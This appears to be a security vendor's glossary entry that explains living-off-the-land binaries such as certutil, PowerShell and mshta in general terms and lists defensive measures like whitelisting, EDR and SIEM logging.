Inhalt
What is a LOLBin?
An LOLBin (Living Off The Land Binary) is a legitimate system file or script that was originally developed for administrative or diagnostic purposes. However, attackers use these files to carry out malicious activities without injecting new, suspicious files into the system. This approach makes detection by traditional security solutions such as antivirus programs more difficult. One example is “certutil.exe” on Windows systems, which was developed to manage certificates but can also be misused to download malware.
Can you give an example of a LOLBin?
One prominent example is “powershell.exe”, a powerful administration tool on Windows operating systems. Attackers can use PowerShell scripts to execute commands, exfiltrate sensitive data or load malware. Another example is “mshta.exe”, a file for executing HTML applications that attackers use to execute malicious JavaScript or VBScript codes.
Which LOLBins are used most frequently?
- powershell.exe: For the execution of scripts and automation. Often misused to bypass security controls.
- wmic.exe: Enables queries and manipulation of system information and is often used to execute commands on multiple devices.
- mshta.exe: Loads malicious HTML or VBScript files.
- rundll32.exe: Used to execute DLL files that may contain malicious code.
- certutil.exe: Is used to manage certificates, but also to transfer data via HTTP.
These tools are particularly attractive because they are pre-installed in most operating systems and are considered trustworthy.
How do LOLBAS differ from conventional malware?
LOLBAS techniques use existing and trusted system files, while traditional malware is usually inserted into the system as separate, recognizable code. Since LOLBins are part of the operating system, they are often not recognized as a threat by security solutions. Furthermore, no additional software is installed, which makes detection and forensic analysis much more difficult. Attackers can therefore act more inconspicuously and bypass security measures based on new or unknown files.
How can companies protect themselves against LOLBAS attacks?
- Monitoring and logging:
- Tools such as PowerShell should be run in restrictive modes that only allow signed scripts.
- Monitoring tools such as Endpoint Detection and Response (EDR) can identify anomalies in the behavior of legitimate files.
- enforce restrictions:
- Application whitelisting: Only authorized programs may be executed.
- Group Policies: Restrict which users have access to administrative tools such as PowerShell or WMI.
- Training and sensitization:
- IT teams should be trained to recognize typical signs of LOLBAS techniques.
- Zero trust strategy:
- A zero-trust architecture ensures that no application or file can be executed without restriction, even if it appears trustworthy at first glance.
- Forensic analysis:
- Logs from SIEM (Security Information and Event Management) systems can be used to track suspicious activities.
Are there resources to learn more about LOLBAS?
The LOLBAS project is one of the most comprehensive resources for IT decision makers and security experts. It documents a variety of known LOLBins, LOLLibs (Living Off The Land Libraries) and LOLScripts, including their legitimate and abusive uses. It also contains recommendations for prevention and identification.
Zurück zur Übersicht des Glossars